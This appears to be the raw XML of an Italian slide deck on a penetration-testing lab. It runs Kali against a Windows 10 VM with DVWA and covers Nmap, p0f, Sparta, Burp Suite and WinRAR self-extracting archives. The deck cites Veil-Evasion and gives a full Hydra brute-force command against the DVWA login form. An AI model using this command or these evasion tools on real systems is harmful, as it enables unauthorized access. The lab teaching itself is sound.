              <a:rPr kumimoji="0" lang="it-IT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Online Password Cracking - </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="it-IT" sz="32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Hydra</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="it-I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9154" name="Picture 2" descr="Risultati immagini per hydra kal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8412" y="4077652"/>
            <a:ext cx="4724400" cy="2627948"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="CasellaDiTesto 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="531812" y="1981200"/>
            <a:ext cx="533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Attraverso </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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Hydra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posso effettuare attacchi online di brute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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force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pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="it-IT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it-IT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Hydra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è stato utilizzato per l’attacco di brute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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force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DVWA.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0412" y="457200"/>
            <a:ext cx="1051560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Tool</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="it-I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per</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="it-IT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Raccolta </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="it-IT" sz="32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informazini</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="it-IT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Web </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="it-IT" sz="32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App</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="it-IT" sz="32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it-IT" sz="32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Burp</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="it-IT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Suite</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="it-I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5297" name="Rectangle 1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531812" y="1981200"/>
            <a:ext cx="5334000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it-IT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Burp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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Suite  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è un set di strumenti con cui posso valutare la sicurezza di una web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="it-IT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È stato utilizzato per la raccolta di informazioni sulla </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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per il login a Infiniti.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc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5299" name="Picture 3" descr="Risultati immagini per burp suite"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect l="13125" t="21112" r="13125" b="12222"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6094412" y="2743200"/>
            <a:ext cx="5694680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0412" y="457200"/>
            <a:ext cx="1051560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Tool</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="it-I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per</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="it-IT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la creazione di archivi </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="it-IT" sz="32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Win-RAR</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="it-I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5297" name="Rectangle 1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531812" y="3352800"/>
            <a:ext cx="533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it-IT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RAR è un software per la creazione di archivi.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pP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particolare è stato utilizzato per la creazione di un archivio auto-estraente.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Risultati immagini per win ra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8412" y="3048000"/>
            <a:ext cx="3990512" cy="2362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0412" y="457200"/>
            <a:ext cx="1051560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Tool</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="it-IT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 Microsoft Excel</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="it-I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5297" name="Rectangle 1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836612" y="1905000"/>
            <a:ext cx="633067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Excel è stato utilizzato per la creazione della griglia delle vulnerabilità e per i grafici nel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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penetration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test report </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Immagine 8" descr="Excel-Ic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4412" y="304800"/>
            <a:ext cx="1371600" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Immagine 9" descr="Schermata del 2019-07-23 08-44-3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4212" y="3200400"/>
            <a:ext cx="10641106" cy="34155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0412" y="457200"/>
            <a:ext cx="1051560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dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="it-I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5297" name="Rectangle 1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 descr="Risultati immagini per nmap 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3212" y="2362200"/>
            <a:ext cx="3657600" cy="2826329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="CasellaDiTesto 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1293812" y="1905000"/>
            <a:ext cx="48768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it-IT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("Network Mapper") è  un software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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open-source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per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network discovery e security auditing.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0" y="6488668"/>
            <a:ext cx="12188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dirty="0" err="1" smtClean="0"/>
              <a:t>*Non</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> presente nel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Penetration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> Test Report</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rettangolo 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2055812" y="2971800"/>
            <a:ext cx="36115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-T5 -p- 10.0.2.15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1903412" y="3581400"/>
            <a:ext cx="53340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dove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-sV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interroga una porta per conoscere più informazioni possibili;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T5 indica la velocità di esecuzione;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p- scansiona tutte le porte 2^16 ;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0412" y="457200"/>
            <a:ext cx="1051560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dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t> – risultati prodotti </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="it-I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5297" name="Rectangle 1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0" y="6488668"/>
            <a:ext cx="12188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dirty="0" err="1" smtClean="0"/>
              <a:t>*Non</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> presente nel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Penetration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> Test Report</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Immagine 10" descr="Schermata del 2019-07-22 09-26-44.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect t="6805"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1668046" y="1845263"/>
            <a:ext cx="8845966" cy="43269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0412" y="457200"/>
            <a:ext cx="1051560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dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Os</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Fingerprinting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="it-I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5297" name="Rectangle 1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 descr="Risultati immagini per nmap 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3212" y="2362200"/>
            <a:ext cx="3657600" cy="2826329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="CasellaDiTesto 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1293812" y="1600200"/>
            <a:ext cx="48768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it-IT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permette attraverso il comando  -O di analizzare la macchina target per conoscerne il sistema operativo.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0" y="6488668"/>
            <a:ext cx="12188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dirty="0" err="1" smtClean="0"/>
              <a:t>*Non</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> presente nel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Penetration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> Test Report</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rettangolo 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2436812" y="3200400"/>
            <a:ext cx="2507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-O 10.0.2.15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magine 10" descr="Schermata del 2019-07-22 12-16-2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9412" y="4114800"/>
            <a:ext cx="7239000" cy="129817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0412" y="457200"/>
            <a:ext cx="1051560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it-IT" sz="3200" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" noProof="0" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>0f - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>Os</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>Fingerprinting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="it-I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5297" name="Rectangle 1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0" y="6488668"/>
            <a:ext cx="12188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dirty="0" err="1" smtClean="0"/>
              <a:t>*Non</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> presente nel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Penetration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> Test Report</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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1065212" y="1600200"/>
            <a:ext cx="533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P0f (Passive OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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fingerprinting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è un Software Open Source (licenza GPL) che attraverso la tecnica </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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fingerprinting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passivo riesce a determinare il sistema operativo di un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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remoto.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3351212" y="3505200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p0f -i eth0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Immagine 14" descr="Schermata del 2019-07-22 12-32-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3012" y="1600200"/>
            <a:ext cx="5602941" cy="1757082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Immagine 15" descr="Schermata del 2019-07-22 12-32-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79696" y="3505200"/>
            <a:ext cx="5809129" cy="1739153"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="CasellaDiTesto 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="836612" y="4114800"/>
            <a:ext cx="53340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 ridurre i tempi di attesa dalla macchina attaccante digitare</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pP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10.0.2.15:9999/Infiniti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Scaricare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installare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> XAMPP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370012" y="1676400"/>
            <a:ext cx="9372600" cy="1752600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>XAMPP è una piattaforma software multipiattaforma e libera costituita da Apache HTTP Server , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>FileZilla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Mercury</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Tomcat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612" y="2514600"/>
            <a:ext cx="7924800" cy="4118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0412" y="457200"/>
            <a:ext cx="1051560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it-IT" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Sparta – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>Os</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>Fingerprinting</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="it-I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5297" name="Rectangle 1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0" y="6488668"/>
            <a:ext cx="12188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dirty="0" smtClean="0"/>
              <a:t>* Non presente nel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Penetration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> Test Report</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Immagine 17" descr="Schermata del 2019-07-22 12-49-5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3412" y="3124200"/>
            <a:ext cx="5969112" cy="2590800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rettangolo 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="1828800"/>
            <a:ext cx="6092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 smtClean="0"/>
              <a:t>SPARTA è un'applicazione GUI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> che semplifica i test di scansione e di enumerazione delle macchine target.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18434" name="Picture 2" descr="Risultati immagini per Sparta kali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55225" y="1676400"/>
            <a:ext cx="2133600" cy="1200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0412" y="457200"/>
            <a:ext cx="1051560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it-IT" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>Os</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>Fingerprinting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" dirty="0" smtClean="0"/>
              <a:t> Attivo - Manuale </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="it-I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5297" name="Rectangle 1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0" y="6488668"/>
            <a:ext cx="12188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dirty="0" smtClean="0"/>
              <a:t>* Non presente nel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Penetration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> Test Report</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Immagine 11" descr="Schermata del 2019-07-22 12-44-4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6212" y="1981200"/>
            <a:ext cx="9124926" cy="402067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0412" y="457200"/>
            <a:ext cx="1051560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Riferimenti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5297" name="Rectangle 1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ja-JP" sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="3F251D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hydra -L UserList.txt -P UserList.txt -V -e ns -u -F -t 64 -w 1 -W1 10.0.2.15 http-post-form "/DVWA/login.php:username=^USER^&amp;password=^PASS^&amp;user_token=${CSRF}&amp;Login=Login:S=Location\: index.php:H=Cookie: security=impossible; PHPSESSID=${SESSIONID}"</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="it-IT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141412" y="1676400"/>
            <a:ext cx="10287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 err="1" smtClean="0"/>
              <a:t>Macchina</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> Target: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Macchina </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-image-download/</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Macchina </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Win</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" smtClean="0"/>
              <a:t> 10: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://developer.microsoft.com/it-it/windows/downloads/virtual-machines</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pP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it-IT" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>WinRAR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" smtClean="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.winrar.it/</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Veil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://github.com/Veil-Framework/Veil-Evasion</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" smtClean="0"/>
              <a:t>JDK:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://www.oracle.com/technetwork/java/javase/downloads/index.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" smtClean="0"/>
              <a:t>JRE: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://javadl.oracle.com/webapps/download/AutoDL?BundleId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" smtClean="0"/>
              <a:t>[...]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" smtClean="0"/>
              <a:t>XAMPP: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>https://www.apachefriends.org/it/index.html</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>http://www.python.it/download</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" smtClean="0"/>
              <a:t>DVWA: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>http://www.dvwa.co.uk/</a:t>
            </a:r>
